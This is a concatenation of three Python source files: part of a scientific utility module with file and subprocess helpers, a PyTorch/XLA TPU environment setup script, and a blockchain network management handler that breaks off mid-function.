logger.info("\x1b[93monefile() will copy %s to %s\x1b[0m\n" % (os.path.abspath(fnm), os.getcwd()))
shutil.copy2(fsrc, fdest)
return os.path.basename(fnm)
elif err==True or ext is None:
logger.error("File specified by %s does not exist!" % fnm)
raise RuntimeError
elif ext is not None:
warn_once("File specified by %s does not exist - will try to autodetect .%s extension" % (fnm, ext))
answer = None
cwd = os.getcwd()
ls = [i for i in os.listdir(cwd) if i.endswith('.%s' % ext)]
if len(ls) != 1:
if err:
logger.error("Cannot find a unique file with extension .%s in %s (%i found; %s)" % (ext, cwd, len(ls), ' '.join(ls)))
raise RuntimeError
else:
warn_once("Cannot find a unique file with extension .%s in %s (%i found; %s)" %
(ext, cwd, len(ls), ' '.join(ls)), warnhash = "Found %i .%s files" % (len(ls), ext))
else:
answer = os.path.basename(ls[0])
warn_once("Autodetected %s in %s" % (answer, cwd), warnhash = "Autodetected %s" % answer)
return answer
# Purpose: Given a file name / file list and/or an extension, do one of the following:
# 1) If provided a file list, check each file in the list
# and crash if any file does not exist. Return the list.
# 2) If provided a file name, check the file and crash if the file
# does not exist. Return a length-one list with the file name.
# 3) If list is empty but extension is provided, check for files that
# match the extension. If so, append them to the list.
# 4) If list is still empty and err==True, then crash with an error.
def listfiles(fnms=None, ext=None, err=False, dnm=None):
answer = []
cwd = os.path.abspath(os.getcwd())
if dnm is not None:
os.chdir(dnm)
if isinstance(fnms, list):
for i in fnms:
if not os.path.exists(i):
logger.error('Specified %s but it does not exist' % i)
raise RuntimeError
answer.append(i)
elif isinstance(fnms, six.string_types):
if not os.path.exists(fnms):
logger.error('Specified %s but it does not exist' % fnms)
raise RuntimeError
answer = [fnms]
elif fnms is not None:
logger.info(str(fnms))
logger.error('First argument to listfiles must be a list, a string, or None')
raise RuntimeError
if answer == [] and ext is not None:
answer = [os.path.basename(i) for i in os.listdir(os.getcwd()) if i.endswith('.%s' % ext)]
if answer == [] and err:
logger.error('listfiles function failed to come up with a file! (fnms = %s ext = %s)' % (str(fnms), str(ext)))
raise RuntimeError
for ifnm, fnm in enumerate(answer):
if os.path.dirname(os.path.abspath(fnm)) != os.getcwd():
fsrc = os.path.abspath(fnm)
fdest = os.path.join(os.getcwd(), os.path.basename(fnm))
#-----
# If the file path doesn't correspond to the current directory, copy the file over
# If the file exists in the current directory already and it's different, then crash.
#-----
if os.path.exists(fdest):
if not filecmp.cmp(fsrc, fdest):
logger.error("onefile() will not overwrite %s with %s\n" % (os.path.join(os.getcwd(), os.path.basename(fnm)),os.path.abspath(fnm)))
raise RuntimeError
else:
logger.info("\x1b[93monefile() says the files %s and %s are identical\x1b[0m\n" % (os.path.abspath(fnm), os.getcwd()))
answer[ifnm] = os.path.basename(fnm)
else:
logger.info("\x1b[93monefile() will copy %s to %s\x1b[0m\n" % (os.path.abspath(fnm), os.getcwd()))
shutil.copy2(fsrc, fdest)
answer[ifnm] = os.path.basename(fnm)
os.chdir(cwd)
return answer
def extract_tar(tarfnm, fnms, force=False):
"""
Extract a list of files from .tar archive with any compression.
The file is extracted to the base folder of the archive.
Parameters
----------
tarfnm :
Name of the archive file.
fnms : str or list
File names to be extracted.
force : bool, optional
If true, then force extraction of file even if they already exist on disk.
"""
# Get path of tar file.
fdir = os.path.abspath(os.path.dirname(tarfnm))
# If all files exist, then return - no need to extract.
if (not force) and all([os.path.exists(os.path.join(fdir, f)) for f in fnms]): return
# If the tar file doesn't exist or isn't valid, do nothing.
if not os.path.exists(tarfnm): return
if not tarfile.is_tarfile(tarfnm): return
# Check type of fnms argument.
if isinstance(fnms, six.string_types): fnms = [fnms]
# Load the tar file.
arch = tarfile.open(tarfnm, 'r')
# Extract only the files we have (to avoid an exception).
all_members = arch.getmembers()
all_names = [f.name for f in all_members]
members = [f for f in all_members if f.name in fnms]
# Extract files to the destination.
arch.extractall(fdir, members=members)
def GoInto(Dir):
if os.path.exists(Dir):
if os.path.isdir(Dir): pass
else:
logger.error("Tried to create directory %s, it exists but isn't a directory\n" % newdir)
raise RuntimeError
else:
os.makedirs(Dir)
os.chdir(Dir)
def allsplit(Dir):
# Split a directory into all directories involved.
s = os.path.split(os.path.normpath(Dir))
if s[1] == '' or s[1] == '.' : return []
return allsplit(s[0]) + [s[1]]
def Leave(Dir):
if os.path.split(os.getcwd())[1] != Dir:
logger.error("Trying to leave directory %s, but we're actually in directory %s (check your code)\n" % (Dir,os.path.split(os.getcwd())[1]))
raise RuntimeError
for i in range(len(allsplit(Dir))):
os.chdir('..')
# Dictionary containing specific error messages for specific missing files or file patterns
specific_lst = [(['mdrun','grompp','trjconv','g_energy','g_traj'], "Make sure to install GROMACS and add it to your path (or set the gmxpath option)"),
(['force.mdin', 'stage.leap'], "This file is needed for setting up AMBER force matching targets"),
(['conf.pdb', 'mono.pdb'], "This file is needed for setting up OpenMM condensed phase property targets"),
(['liquid.xyz', 'liquid.key', 'mono.xyz', 'mono.key'], "This file is needed for setting up OpenMM condensed phase property targets"),
(['dynamic', 'analyze', 'minimize', 'testgrad', 'vibrate', 'optimize', 'polarize', 'superpose'], "Make sure to install TINKER and add it to your path (or set the tinkerpath option)"),
(['runcuda.sh', 'npt.py', 'npt_tinker.py'], "This file belongs in the ForceBalance source directory, not sure why it is missing"),
(['input.xyz'], "This file is needed for TINKER molecular property targets"),
(['.*key$', '.*xyz$'], "I am guessing this file is probably needed by TINKER"),
(['.*gro$', '.*top$', '.*itp$', '.*mdp$', '.*ndx$'], "I am guessing this file is probably needed by GROMACS")
]
# Build a dictionary mapping all of the keys in the above lists to their error messages
specific_dct = dict(list(itertools.chain(*[[(j,i[1]) for j in i[0]] for i in specific_lst])))
def MissingFileInspection(fnm):
fnm = os.path.split(fnm)[1]
answer = ""
for key in specific_dct:
if answer == "":
answer += "\n"
if re.match(key, fnm):
answer += "%s\n" % specific_dct[key]
return answer
def wopen(dest, binary=False):
""" If trying to write to a symbolic link, remove it first. """
if os.path.islink(dest):
logger.warning("Trying to write to a symbolic link %s, removing it first\n" % dest)
os.unlink(dest)
if binary:
return open(dest,'wb')
else:
return open(dest,'w')
def LinkFile(src, dest, nosrcok = False):
if os.path.abspath(src) == os.path.abspath(dest): return
if os.path.exists(src):
# Remove broken link
if os.path.islink(dest) and not os.path.exists(dest):
os.remove(dest)
os.symlink(src, dest)
elif os.path.exists(dest):
if os.path.islink(dest): pass
else:
logger.error("Tried to create symbolic link %s to %s, destination exists but isn't a symbolic link\n" % (src, dest))
raise RuntimeError
else:
os.symlink(src, dest)
else:
if not nosrcok:
logger.error("Tried to create symbolic link %s to %s, but source file doesn't exist%s\n" % (src,dest,MissingFileInspection(src)))
raise RuntimeError
def CopyFile(src, dest):
if os.path.exists(src):
if os.path.exists(dest):
if os.path.islink(dest):
logger.error("Tried to copy %s to %s, destination exists but it's a symbolic link\n" % (src, dest))
raise RuntimeError
else:
shutil.copy2(src, dest)
else:
logger.error("Tried to copy %s to %s, but source file doesn't exist%s\n" % (src,dest,MissingFileInspection(src)))
raise RuntimeError
def link_dir_contents(abssrcdir, absdestdir):
for fnm in os.listdir(abssrcdir):
srcfnm = os.path.join(abssrcdir, fnm)
destfnm = os.path.join(absdestdir, fnm)
if os.path.islink(destfnm) and not os.path.exists(destfnm):
os.remove(destfnm)
if os.path.isfile(srcfnm) or (os.path.isdir(srcfnm) and fnm == 'IC'):
if not os.path.exists(destfnm):
#print "Linking %s to %s" % (srcfnm, destfnm)
os.symlink(srcfnm, destfnm)
def remove_if_exists(fnm):
""" Remove the file if it exists (doesn't return an error). """
if os.path.exists(fnm):
os.remove(fnm)
def which(fnm):
# Get the location of a file. Works only on UNIX-like file systems.
try:
return os.path.split(os.popen('which %s 2> /dev/null' % fnm).readlines()[0].strip())[0]
except:
return ''
# Thanks to cesarkawakami on #python (IRC freenode) for this code.
class LineChunker(object):
def __init__(self, callback):
self.callback = callback
self.buf = ""
def push(self, data):
# Added by LPW during Py3 compatibility; ran into some trouble decoding strings such as
# "a" with umlaut on top. I guess we can ignore these for now. For some reason,
# Py2 never required decoding of data, I can simply add it to the wtring.
# self.buf += data # Old Py2 code...
self.buf += data.decode('utf-8')#errors='ignore')
self.nomnom()
def close(self):
if self.buf:
self.callback(self.buf + "\n")
def nomnom(self):
# Splits buffer by new line or carriage return, and passes
# the splitted results onto processing.
while "\n" in self.buf or "\r" in self.buf:
chunk, sep, self.buf = re.split(r"(\r|\n)", self.buf, maxsplit=1)
self.callback(chunk + sep)
def __enter__(self):
return self
def __exit__(self, *args, **kwargs):
self.close()
def _exec(command, print_to_screen = False, outfnm = None, logfnm = None, stdin = "", print_command = True, copy_stdout = True, copy_stderr = False, persist = False, expand_cr=False, print_error=True, rbytes=1, cwd=None, **kwargs):
"""Runs command line using subprocess, optionally returning stdout.
Options:
command (required) = Name of the command you want to execute
outfnm (optional) = Name of the output file name (overwritten if exists)
logfnm (optional) = Name of the log file name (appended if exists)
stdin (optional) = A string to be passed to stdin, as if it were typed (use newline character to mimic Enter key)
print_command = Whether to print the command.
copy_stdout = Copy the stdout stream; can set to False in strange situations
copy_stderr = Copy the stderr stream to the stdout stream; useful for GROMACS which prints out everything to stderr (argh.)
expand_cr = Whether to expand carriage returns into newlines (useful for GROMACS mdrun).
print_error = Whether to print error messages on a crash. Should be true most of the time.
persist = Continue execution even if the command gives a nonzero return code.
rbytes = Number of bytes to read from stdout and stderr streams at a time. GMX requires rbytes = 1 otherwise streams are interleaved. Higher values for speed.
"""
# Dictionary of options to be passed to the Popen object.
cmd_options={'shell':isinstance(command, six.string_types), 'stdin':PIPE, 'stdout':PIPE, 'stderr':PIPE, 'universal_newlines':expand_cr, 'cwd':cwd}
# If the current working directory is provided, the outputs will be written to there as well.
if cwd is not None:
if outfnm is not None:
outfnm = os.path.abspath(os.path.join(cwd, outfnm))
if logfnm is not None:
logfnm = os.path.abspath(os.path.join(cwd, logfnm))
# "write to file" : Function for writing some characters to the log and/or output files.
def wtf(out):
if logfnm is not None:
with open(logfnm,'ab+') as f:
f.write(out.encode('utf-8'))
f.flush()
if outfnm is not None:
with open(outfnm,'wb+' if wtf.first else 'ab+') as f:
f.write(out.encode('utf-8'))
f.flush()
wtf.first = False
wtf.first = True
# Preserve backwards compatibility; sometimes None gets passed to stdin.
if stdin is None: stdin = ""
if print_command:
logger.info("Executing process: \x1b[92m%-50s\x1b[0m%s%s%s%s\n" % (' '.join(command) if type(command) is list else command,
" In: %s" % cwd if cwd is not None else "",
" Output: %s" % outfnm if outfnm is not None else "",
" Append: %s" % logfnm if logfnm is not None else "",
(" Stdin: %s" % stdin.replace('\n','\\n')) if stdin else ""))
wtf("Executing process: %s%s\n" % (command, (" Stdin: %s" % stdin.replace('\n','\\n')) if stdin else ""))
cmd_options.update(kwargs)
p = subprocess.Popen(command, **cmd_options)
# Write the stdin stream to the process.
p.stdin.write(stdin.encode('ascii'))
p.stdin.close()
#===============================================================#
#| Read the output streams from the process. This is a bit |#
#| complicated because programs like GROMACS tend to print out |#
#| stdout as well as stderr streams, and also carriage returns |#
#| along with newline characters. |#
#===============================================================#
# stdout and stderr streams of the process.
streams = [p.stdout, p.stderr]
# These are functions that take chunks of lines (read) as inputs.
def process_out(read):
if print_to_screen: sys.stdout.write(str(read.encode('utf-8')))
if copy_stdout:
process_out.stdout.append(read)
wtf(read)
process_out.stdout = []
def process_err(read):
if print_to_screen: sys.stderr.write(str(read.encode('utf-8')))
process_err.stderr.append(read)
if copy_stderr:
process_out.stdout.append(read)
wtf(read)
process_err.stderr = []
# This reads the streams one byte at a time, and passes it to the LineChunker
# which splits it by either newline or carriage return.
# If the stream has ended, then it is removed from the list.
with LineChunker(process_out) as out_chunker, LineChunker(process_err) as err_chunker:
while True:
to_read, _, _ = select(streams, [], [])
for fh in to_read:
if fh is p.stdout:
read_nbytes = 0
read = ''.encode('utf-8')
while True:
if read_nbytes == 0:
read += fh.read(rbytes)
read_nbytes += rbytes
else:
read += fh.read(1)
read_nbytes += 1
if read_nbytes > 10+rbytes:
raise RuntimeError("Failed to decode stdout from external process.")
if not read:
streams.remove(p.stdout)
p.stdout.close()
break
else:
try:
out_chunker.push(read)
break
except UnicodeDecodeError:
pass
elif fh is p.stderr:
read_nbytes = 0
read = ''.encode('utf-8')
while True:
if read_nbytes == 0:
read += fh.read(rbytes)
read_nbytes += rbytes
else:
read += fh.read(1)
read_nbytes += 1
if read_nbytes > 10+rbytes:
raise RuntimeError("Failed to decode stderr from external process.")
if not read:
streams.remove(p.stderr)
p.stderr.close()
break
else:
try:
err_chunker.push(read)
break
except UnicodeDecodeError:
pass
else:
raise RuntimeError
if len(streams) == 0: break
p.wait()
process_out.stdout = ''.join(process_out.stdout)
process_err.stderr = ''.join(process_err.stderr)
_exec.returncode = p.returncode
if p.returncode != 0:
if process_err.stderr and print_error:
logger.warning("Received an error message:\n")
logger.warning("\n[====] \x1b[91mError Message\x1b[0m [====]\n")
logger.warning(process_err.stderr)
logger.warning("[====] \x1b[91mEnd o'Message\x1b[0m [====]\n")
if persist:
if print_error:
logger.info("%s gave a return code of %i (it may have crashed) -- carrying on\n" % (command, p.returncode))
else:
# This code (commented out) would not throw an exception, but instead exit with the returncode of the crashed program.
# sys.stderr.write("\x1b[1;94m%s\x1b[0m gave a return code of %i (\x1b[91mit may have crashed\x1b[0m)\n" % (command, p.returncode))
# sys.exit(p.returncode)
logger.error("\x1b[1;94m%s\x1b[0m gave a return code of %i (\x1b[91mit may have crashed\x1b[0m)\n\n" % (command, p.returncode))
raise RuntimeError
# Return the output in the form of a list of lines, so we can loop over it using "for line in output".
Out = process_out.stdout.split('\n')
if Out[-1] == '':
Out = Out[:-1]
return Out
_exec.returncode = None
def warn_press_key(warning, timeout=10):
logger.warning(warning + '\n')
if sys.stdin.isatty():
logger.warning("\x1b[1;91mPress Enter or wait %i seconds (I assume no responsibility for what happens after this!)\x1b[0m\n" % timeout)
try:
rlist, wlist, xlist = select([sys.stdin], [], [], timeout)
if rlist:
sys.stdin.readline()
except: pass
def warn_once(warning, warnhash = None):
""" Prints a warning but will only do so once in a given run. """
if warnhash is None:
warnhash = warning
if warnhash in warn_once.already:
return
warn_once.already.add(warnhash)
if type(warning) is str:
logger.info(warning + '\n')
elif type(warning) is list:
for line in warning:
logger.info(line + '\n')
warn_once.already = set()
#=========================================#
#| Development stuff (not commonly used) |#
#=========================================#
def concurrent_map(func, data):
"""
Similar to the bultin function map(). But spawn a thread for each argument
and apply `func` concurrently.
Note: unlike map(), we cannot take an iterable argument. `data` should be an
indexable sequence.
"""
N = len(data)
result = [None] * N
# wrapper to dispose the result in the right slot
def task_wrapper(i):
result[i] = func(data[i])
threads = [threading.Thread(target=task_wrapper, args=(i,)) for i in range(N)]
for t in threads:
t.start()
for t in threads:
t.join()
return result
|
pytorch-xla-env-setup.py | #!/usr/bin/env python
# Sample usage:
# python env-setup.py --version 1.5 --apt-packages libomp5
import argparse
import collections
from datetime import datetime
import os
import re
import requests
import subprocess
import threading
VersionConfig = collections.namedtuple('VersionConfig', ['wheels', 'tpu'])
OLDEST_VERSION = datetime.strptime('20200318', '%Y%m%d')
DIST_BUCKET = 'gs://tpu-pytorch/wheels'
TORCH_WHEEL_TMPL = 'torch-{whl_version}-cp36-cp36m-linux_x86_64.whl'
TORCH_XLA_WHEEL_TMPL = 'torch_xla-{whl_version}-cp36-cp36m-linux_x86_64.whl'
TORCHVISION_WHEEL_TMPL = 'torchvision-{whl_version}-cp36-cp36m-linux_x86_64.whl'
def update_tpu_runtime(tpu_ip, version):
print(f'Updating TPU runtime to {version.tpu} ...')
url = 'http://{tpu_ip}:8475/requestversion/{tpu_version}'.format(
tpu_ip=tpu_ip, tpu_version=version.tpu)
print('Done updating TPU runtime: {}'.format(requests.post(url)))
def get_version(version):
if version == 'nightly':
return VersionConfig('nightly', 'pytorch-nightly')
version_date = None
try:
version_date = datetime.strptime(version, '%Y%m%d')
except ValueError:
pass # Not a dated nightly.
if version_date:
if version_date < OLDEST_VERSION:
raise ValueError(f'Oldest nightly version available is {OLDEST_VERSION}')
return VersionConfig(f'nightly+{version}', f'pytorch-dev{version}')
version_regex = re.compile('^(\d+\.)+\d+$')
if not version_regex.match(version):
raise ValueError(f'{version} is an invalid torch_xla version pattern')
return VersionConfig(version, f'pytorch-{version}')
def parse_env_tpu_ip():
# In both Colab and Kaggle: TPU_NAME='grpc://abc.def.ghi.jkl:8470'
tpu_addr = os.environ.get('TPU_NAME', None)
tpu_ip_regex = re.compile('grpc://(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}):8470')
m_tpu_ip = tpu_ip_regex.match(tpu_addr)
if not m_tpu_ip:
raise ValueError('TPU not found.')
return m_tpu_ip.group(1)
def install_vm(version, apt_packages):
torch_whl = TORCH_WHEEL_TMPL.format(whl_version=version.wheels)
torch_whl_path = os.path.join(DIST_BUCKET, torch_whl)
torch_xla_whl = TORCH_XLA_WHEEL_TMPL.format(whl_version=version.wheels)
torch_xla_whl_path = os.path.join(DIST_BUCKET, torch_xla_whl)
torchvision_whl = TORCHVISION_WHEEL_TMPL.format(whl_version=version.wheels)
torchvision_whl_path = os.path.join(DIST_BUCKET, torchvision_whl)
apt_cmd = ['apt-get', 'install', '-y']
apt_cmd.extend(apt_packages)
installation_cmds = [
['pip', 'uninstall', '-y', 'torch', 'torchvision'],
['gsutil', 'cp', torch_whl_path, '.'],
['gsutil', 'cp', torch_xla_whl_path, '.'],
['gsutil', 'cp', torchvision_whl_path, '.'],
['pip', 'install', torch_whl],
['pip', 'install', torch_xla_whl],
['pip', 'install', torchvision_whl],
apt_cmd,
]
for cmd in installation_cmds:
subprocess.call(cmd)
def run_setup(args):
version = get_version(args.version)
tpu_ip = args.tpu_ip if args.tpu_ip else parse_env_tpu_ip()
# Update TPU
print('Updating TPU and VM. This may take around 2 minutes.')
update = threading.Thread(target=update_tpu_runtime, args=(tpu_ip, version,))
update.start()
install_vm(version, args.apt_packages)
update.join()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--version',
type=str,
default='20200325',
help='Versions to install (nightly, release version, or YYYYMMDD).',
)
parser.add_argument(
'--apt-packages',
nargs='+',
default=['libomp5'],
help='List of apt packages to install',
)
parser.add_argument(
'--tpu-ip',
type=str,
help='TPU internal ip address',
)
args = parser.parse_args()
run_setup(args)
|
blockchain_network.py | from threading import Thread
import time
import socket
import shutil
import requests
from agent.docker.blockchain_network import NetworkOnDocker
from agent.k8s.blockchain_network import NetworkOnKubenetes
from modules.models import modelv2
from modules.organization import organizationHandler as org_handler
import datetime
from common import fabric_network_define as file_define
from common import CLUSTER_PORT_START, CLUSTER_PORT_STEP, WORKER_TYPE_K8S
import json
import logging
import os
from subprocess import call
from common import log_handler, LOG_LEVEL
from modules import host_handler
logger = logging.getLogger(__name__)
logger.setLevel(LOG_LEVEL)
logger.addHandler(log_handler)
PEER_NODE_HOSTPORT_NUM = 2
ORDERER_NODE_HOSTPORT_NUM = 1
CA_NODE_HOSTPORT_NUM = 1
COUCHDB_NODE_HOSTPORT_NUM = 1
PEER_NODE_HOSTPORT_NUM_WITH_CCLISTEN = 3
agent_cls = {
'docker': NetworkOnDocker,
'kubenetes': NetworkOnKubenetes
}
fabric_image_version = {
'v1.1': '1.1.0',
'v1.4': '1.4.2'
}
# CELLO_MASTER_FABRIC_DIR is mounted by nfs container as '/'
CELLO_MASTER_FABRIC_DIR = '/opt/fabric/'
CELLO_SECRET_FOR_TOKEN_DIR = '/opt/secret/'
def health_check():
#print("test block chain healthy !!")
#logger.info("block chain healthy ")
networks = modelv2.BlockchainNetwork.objects().all()
if not networks:
print("no blockchain !!")
time.sleep(10)
return
for network in networks:
service_endpoints = modelv2.ServiceEndpoint.objects(network=network)
if not service_endpoints:
network.update(set__healthy=False)
print("no endpoints !!")
continue
end_healthy = True
healthy = False
time.sleep(5)
for ep in service_endpoints:
# event port is not needed in fabric 1.4
# don't do health check on event port to avoid health check fail on fabric 1.3 later
if ep.service_type == 'peer' and ep.peer_port_proto == 'cc_listen':
ep.update(set__healthy=True)
continue
ip = ep.service_ip
port = ep.service_port
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((ip, port))
#logger.info("connect {}:{} succeed".format(ip, port))
healthy = True
end_healthy = healthy and end_healthy
ep.update(set__healthy=True)
except Exception as e:
logger.error("connect {}:{} fail, reason {}".format(ip, port, e))
healthy = False
ep.update(set__healthy=False)
# break
finally:
sock.close()
if not healthy:
network.update(set__healthy=False)
return
else:
network.update(set__healthy=True)
return
class BlockchainNetworkHandler(object):
""" Main handler to operate the cluster in pool
"""
def __init__(self):
self.host_agents = {
'docker': NetworkOnDocker(),
'kubernetes': NetworkOnKubenetes()
}
def _schema(self, doc, many=False):
network_schema = modelv2.BlockchainNetworkSchema(many=many)
return network_schema.dump(doc).data
def schema(self, doc, many=False):
return self._schema(doc, many)
def endports_schema(self, doc, many=False):
endports_schema = modelv2.ServiceEndpointSchema(many=many)
return endports_schema.dump(doc).data
# TODO: MODIFY THIS METHOD
def find_free_start_ports(self, number, host):
""" Find the first available port for a new cluster api
This is NOT lock-free. Should keep simple, fast and safe!
Check existing cluster records in the host, find available one.
:param host_id: id of the host
:param number: Number of ports to get
:return: The port list, e.g., [7050, 7150, ...]
"""
logger.debug("Find {} start ports ".format(number))
networks_exists = modelv2.BlockchainNetwork.objects(host=host)
ports_existed = [service.service_port for service in
modelv2.ServiceEndpoint.objects(network__in=networks_exists)]
logger.debug("The ports existed: {}".format(ports_existed))
# available host port range is 1~65535, this function adpots
# start port is 7050, port step is 1, so available port number
# is (65535-30000)/1=35535, considering the network scale,
# setting the most available host port is 30000
if len(ports_existed) + number >= 30000:
logger.warning("Too much ports are already in used.")
return []
candidates = [CLUSTER_PORT_START + i * CLUSTER_PORT_STEP
for i in range(len(ports_existed) + number)]
result = list(filter(lambda x: x not in ports_existed, candidates))
logger.debug("Free ports are {}".format(result[:number]))
return result[:number]
def delete(self, network):
""" Delete a cluster instance
Clean containers, remove db entry. Only operate on active host.
:param id: id of the cluster to delete
:param forced: Whether to removing user-using cluster, for release
:return:
"""
logger.debug("Delete cluster: id={}".format(network.id))
network.update(set__status='deleting')
net_id = network.id
try:
#self.host_agents[host.type].delete(network)
# remove cluster info from host
logger.info("remove network from host, network:{}".format(network.id))
# if org has referenced network, remove
for org_id in network.peer_orgs:
peer_org = org_handler().schema(org_handler().get_by_id(org_id))
host_id = peer_org['host_id']
host_handler.refresh_status(host_id)
host = host_handler.get_active_host_by_id(host_id)
host.update(pull__clusters=network.id)
self.host_agents[host.type].delete_peer_org(peer_org, host, net_id)
org_obj = modelv2.Organization.objects.get(id=org_id)
org_obj.update(unset__network=network.id)
for org_id in network.orderer_orgs:
orderer_org = org_handler().schema(org_handler().get_by_id(org_id))
host_id = orderer_org['host_id']
host_handler.refresh_status(host_id)
host = host_handler.get_active_host_by_id(host_id)
consensus_type = network.consensus_type
host.update(pull__clusters=network.id)
self.host_agents[host.type].delete_orderer_org(orderer_org, consensus_type, host, net_id)
org_obj = modelv2.Organization.objects.get(id=org_id)
org_obj.update(unset__network=network.id)
#从Userdashboard的mongo中删除该network相关的数据
self.userdashboard_mongo_delete(network.id)
network.delete()
filepath = '{}{}'.format(CELLO_MASTER_FABRIC_DIR, network.id)
os.system('rm -rf {}'.format(filepath))
return
except Exception as e:
logger.info("remove network {} fail from host".format(network.id))
network.update(set__status = 'error')
raise e
def get_by_id(self, id):
""" Get a host
:param id: id of the doc
:return: serialized result or obj
"""
try:
ins = modelv2.BlockchainNetwork.objects.get(id=id)
except Exception:
logger.warning("No network found with id=" + id)
return None
return ins
def get_endpoints_list(self, filter_data={}):
""" List orgs with given criteria
:param filter_data: Image with the filter properties
:return: iteration of serialized doc
"""
logger.info("filter data {}".format(filter_data))
network = modelv2.BlockchainNetwork.objects.get(id=filter_data)
serviceEndpoints = modelv2.ServiceEndpoint.objects(network=network)
return self.endports_schema(serviceEndpoints, many=True)
def refresh_health(self, network):
service_endpoints = modelv2.ServiceEndpoint.objects(network=network)
if not service_endpoints:
network.update(set__healthy=False)
end_healthy = True
healthy = False
for ep in service_endpoints:
# event port is not needed in fabric 1.4
# don't do health check on event port to avoid health check fail on fabric 1.3 later
if ep.service_type == 'peer' and ep.peer_port_proto == 'event':
continue
ip = ep.service_ip
port = ep.service_port
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((ip, port))
logger.info("connect {}:{} succeed".format(ip, port))
healthy = True
end_healthy = healthy and end_healthy
except Exception as e:
logger.error("connect {}:{} fail, reason {}".format(ip, port, e))
healthy = False
# break
finally:
sock.close()
if not healthy:
network.update(set__healthy=False)
return
else:
network.update(set__healthy=True)
return
def _create_network(self, network_config, request_host_ports):
net_id = network_config['id']
network = modelv2.BlockchainNetwork.objects.get(id=net_id)
try:
#self.host_agents[host.type].create(network_config, request_host_ports)
# # service urls can only be calculated after service is create
# if host.type == WORKER_TYPE_K8S:
# service_urls = self.host_agents[host.type] \
# .get_services_urls(net_id)
# else:
# service_urls = self.gen_service_urls(net_id)
net_id = network_config['id']
net_name = network_config['name']
couchdb_enabled = False
if network_config['db_type'] == 'couchdb':
couchdb_enabled = True
fabric_version = fabric_image_version[network_config['fabric_version']]
consensus_type = network_config['consensus_type']
portid = []
portid.append(0)
for orderer_org in network_config['orderer_org_dicts']:
host_id = orderer_org['host_id']
host_handler.refresh_status(host_id)
host = host_handler.get_active_host_by_id(host_id)
host.update(add_to_set__clusters=[net_id])
self.host_agents[host.type].create_orderer_org(orderer_org, consensus_type, host, net_id, net_name,
fabric_version, request_host_ports, portid)
time.sleep(5)
for peer_org in network_config['peer_org_dicts']:
host_id = peer_org['host_id']
peer_num = peer_org['peerNum']
host_handler.refresh_status(host_id)
host = host_handler.get_active_host_by_id(host_id)
host.update(add_to_set__clusters=[net_id])
self.host_agents[host.type].create_peer_org(peer_org, couchdb_enabled, host, net_id, net_name,
fabric_version, request_host_ports, portid, peer_num)
network.update(set__status='running')
# zsh修改,为解决网络创建过程中,还可以继续操作组织的问题,将给组织增加网络的动作放到前面
# for peer_org in network_config['peer_org_dicts']:
# org_obj = modelv2.Organization.objects.get(id=peer_org['id'])
# org_obj.update(set__network=network)
# for orderer_org in network_config['orderer_org_dicts']:
# org_obj = modelv2.Organization.objects.get(id=orderer_org['id'])
# org_obj.update(set__network=network)
logger.info("Create network OK, id={}".format(net_id))
def check_health_work(network):
time.sleep(180)
self.refresh_health(network)
t = Thread(target=check_health_work, args=(network,))
t.start()
except Exception as e:
logger.error("network {} create failed for {}".format(net_id, e))
# will not call self.delete(network) in case of nested exception
self.delete(network)
raise e
def _update_network(self, network_config, request_host_ports):
net_id = network_config['id']
network = modelv2.BlockchainNetwork.objects.get(id=net_id)
try:
#self.host_agents[host.type].update(network_config, request_host_ports)
# # service urls can only be calculated after service is create
# if host.type == WORKER_TYPE_K8S:
# service_urls = self.host_agents[host.type] \
# .get_services_urls(net_id)
# else:
# service_urls = self.gen_service_urls(net_id)
net_id = network_config['id']
net_name = network_config['name']
couchdb_enabled = False
if network_config['db_type'] == 'couchdb':
couchdb_enabled = True
fabric_version = fabric_image_version[network_config['fabric_version']]
portid = []
portid.append(0)
for peer_org in network_config['peer_org_dicts']:
host_id = peer_org['host_id']
peer_num = peer_org['peerNum']
host = host_handler.get_active_host_by_id(host_id)
host.update(add_to_set__clusters=[net_id])
self.host_agents[host.type].create_peer_org(peer_org, couchdb_enabled, host, net_id, net_name,
fabric_version, request_host_ports, portid, peer_num)
network.update(set__status='running')
for peer_org in network_config['peer_org_dicts']:
org_obj = modelv2.Organization.objects.get(id=peer_org['id'])
org_obj.update(set__network=network)
for orderer_org in network_config['orderer_org_dicts']:
org_obj = modelv2.Organization.objects.get(id=orderer_org['id'])
org_obj.update(set__network=network)
logger.info("Update network OK, id={}".format(net_id))
except Exception as e:
logger.error("network {} update failed for {}".format(net_id, e))
# will not call self.delete(network) in case of nested exception
#self.delete(network)
raise e
def _update_network_for_addpeers(self, network_config, request_host_ports):
net_id = network_config['id']
network = modelv2.BlockchainNetwork.objects.get(id=net_id)
try:
#self.host_agents[host.type].update(network_config, request_host_ports)
# # service urls can only be calculated after service is create
# if host.type == WORKER_TYPE_K8S:
# service_urls = self.host_agents[host.type] \
# .get_services_urls(net_id)
# else:
# service_urls = self.gen_service_urls(net_id)
net_id = network_config['id']
net_name = network_config['name']
peer_num = network_config['peer_num']
peer_org = network_config['peer_org_dict']
couchdb_enabled = False
if network_config['db_type'] == 'couchdb':
couchdb_enabled = True
fabric_version = fabric_image_version[network_config['fabric_version']]
portid = []
portid.append(0)
host_id = peer_org['host_id']
host = host_handler.get_active_host_by_id(host_id)
host_handler.refresh_status(host_id)
self.host_agents[host.type].create_peer_org(peer_org, couchdb_enabled, host, net_id, net_name,
fabric_version, request_host_ports, portid, peer_num)
network.update(set__status='running')
logger.info("Update network OK, id={}".format(net_id))
except Exception as e:
logger.error("network {} update failed for {}".format(net_id, e))
# will not call self.delete(network) in case of nested exception
#self.delete(network)
raise e
def create(self, id, name, description, fabric_version,
orderer_orgs, peer_orgs, host, consensus_type, db_type, create_ts):
peer_org_dicts = []
orderer_org_dicts = []
for org_id in peer_orgs:
peer_org_dict = org_handler().schema(org_handler().get_by_id(org_id))
# blocakchain_network_id非空,表明该组织已添加到其他nework中
if peer_org_dict['blockchain_network_id']:
error_msg = ': this org has been added by another network!'
raise Exception(error_msg)
peer_org_dicts.append(peer_org_dict)
for org_id in orderer_orgs:
orderer_org_dict = org_handler().schema(org_handler().get_by_id(org_id))
if orderer_org_dict['blockchain_network_id']:
error_msg = ': this org has been added by another network!'
raise Exception(error_msg)
orderer_org_dicts.append(orderer_org_dict)
